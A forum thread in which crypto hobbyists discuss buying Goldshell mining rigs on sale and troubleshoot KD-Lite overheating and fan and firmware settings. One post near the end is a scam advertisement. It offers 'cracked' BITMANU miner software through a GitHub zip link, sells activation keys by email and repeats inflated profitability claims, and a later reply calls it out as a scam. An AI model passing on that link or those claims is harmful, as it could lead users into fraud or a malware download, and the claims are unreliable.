How many goldshell miners are you buying?

Just got a goldshell mini Doge what a steal. What are y’all buying. And how do y’all feel about this sale going on?

4 Likes

I thought about a KD-Box Pro. I could’ve picked one up this a.m. for $999 w/o the PSU. Looking now, they’re sold out. The way things in crypto have been going lately, I’m probably better off that it wasn’t available.

I also thought about adding another KD-Lite as they’re so much more energy efficient than my KD-5’s. But I already have a KD-Lite and it is absolutely struggling with the heat in my garage (though my KD-5s have zero problem at the same intake air temps). So hard pass until I figure out a solution that excludes putting the rig in my house

1 Like

I picked up a kd-box on ebay and a kd-box pro from BT-Miners

1 Like

@Zilina You might be able to ramp up the speed of the fans in miner settings

If you mouse tap Miner like 8 or 10 times you can reveal the settings for the processors and the fan, I don’t know what you’ll find but check it out

my KD5 has the fans at 100 RPM, maybe the light version has fan settings below 100??

1 Like

Thanks for the suggestion!

Fwiw, my KD5s are running v2.1.5. With that version, I can access Powerplan. The KD-Lite defaulted to v2.2.4. With this latest/greatest version, I can’t seem to access Powerplan regardless of what I do. And I’m not sure that the rig can utilize the older drivers.

I assume that the ‘100’ represents a percentage. I’m not sure how much faster I’d want to spin fans that seem to have a 2200 rpm built-in max for the KD-Lite (my KD-5s’ fans can spin to 6080 rpm). And with fan designs, spinning it faster might not result in more air flow (fan blades can “stall”, much like aircraft wing designs)

1 Like

@Zilina
Oiy.
Thanks for the information about the Lite miner, I didn’t know any of that

@Thorn I do think it can work for a lot of people. I might even buy a 2nd KD-Lite if I can learn to manage this particular rig’s heat management needs and should Goldshell’s prices continue to drop. My caution is that if one lives in a warm climate and have rigs in the garage like many of us do, keeping a KD-Lite cool could prove challenging.

Until a month ago, I also had a LT5 Pro hashing in the same spot, plus it was in my garage all last summer. That rig had no problem hashing away happily - and the LT5 Pro draws 3100W compared to 2250W for a KD-5 and 1330W for a KD-Lite.

This is why I think the KD-Lite doesn’t have fans that move enough air. The heat that actually needs to be drawn away is relatively low compared big boy rigs like a S19j Pro or my LT5 Pro. But IMO, Goldshell wants the Lite series miners to fit in a specific marketing bucket, i.e. you can run it in your home. One of the parameters they seem to emphasize is low noise, i.e. 55db for their Lite rigs, which they achieved for the KD-Lite at the expense of the ability of this particular rig’s ability to cool itself in warmer environments.

Alternatively, I could be completely wrong and happened to receive a rig that just plain runs hot. So yes, I could’ve received a rig that’s at the tail end of the curve. But all I know is that all 4 fans are running properly and I don’t hear any loose heat sinks rattling around in the housing when I tip the rig around.

1 Like

When your Lite overheats do you have any indicator lights? I got a HS6 last month and it’s my hottest miner. It quit today. When I flip the switch on, the PSU powers up and the Miner fans spin for about 1 second. I get no lights or indication it’s powered up other than the PSU fans spinning.

1 Like

Red light comes on and it stops hashing. When it goes down, it’s normally for a couple of hours while I’m at work. So by the time I can reboot the rig, it’ll fire back up again and start hashing.

My LT5 Pro ran hot as well, probably similar to your HS6. But it never shut itself down due to over temp.

I picked up 2 KD Box Pros and 1 CKB box. I may get another KD box pro.

2 Likes

Think they sold out of the in box pros. I just looked thinking that 2 for 1 can’t be bad.

Sale lasts until the 30th they will put out more. Keep checking the site

Thanks. Will do

For now zero I got one ck6 working 24 hours a day . I’m a hobby miner just banking everything I can. Best of luck to everybody.

Added a KD, LB, HS, SC, CK, and Mini DOGE Pro to my collection

I picked up 3 KD Box Pro @ $999- Could not resist! Makes me feel dumb that i spent over 5K to get a ‘bundle’ with just 1 KD Box Pro a couple months ago :frowning:

1 Like

We have successfully cracked a way out for BITMANU

You can now be given a routed access to the machine wherever you are in the world you can have its cracked software downloaded and use the free activation key released which is only open to the first 10 while the rest would have to email use here to purchase their keys, no worries you can always request a trial for 12 hours and if you are satisfied with the profit from out farm then you can subscribe by contacting us through this email (dawncheryl4@gmail.com) using the Hashtag #BITMANu as your Subject.

DOWNLOAD LINK: https://github.com/Deeplugs508/BITMANU_Pro_Cracked/archive/refs/heads/main.zip

To understand what what BITMANU is keep reading:

BITMANU~has already earned the distinction of releasing the first ever line of 3nm ASIC miners, and BM Pro is the most powerful product in this range of miners. Equipped with the latest 3nm silicon semiconductor chips, it offers increased speed and transistor density, and reduced power consumption, resulting in significantly higher mining efficiency.

The hash rates with which BM Pro is able to mine Bitcoin, Litecoin, Ethereum, and Monero have not been heard of before its launch. As a result of its unrivalled hash power and power consumption, BM Pro has got the better of all currently available mining hardware in terms of profitability. On an average, all users of the product have been able to recover their initial investment with a month.
BITMANU has already earned the distinction of releasing the first ever line of 3nm ASIC miners, and BM Pro is the most powerful product in this range of miners. Equipped with the latest 3nm silicon semiconductor chips, it offers increased speed and transistor density, and reduced power consumption, resulting in significantly higher mining efficiency.

The hash rates with which BM Pro is able to mine Bitcoin, Litecoin, Ethereum, and Monero have not been heard of before its launch. As a result of its unrivalled hash power and power consumption, BM Pro has got the better of all currently available mining hardware in terms of profitability. On an average, all users of the product have been able to recover their initial investment with a month.

I’m in the same boat with my “bundle” that at the time I was so happy to get! At least you’ve dropped your average purchase price down to $2k, I’ve yet to pull the trigger on another.

Ban this scammer!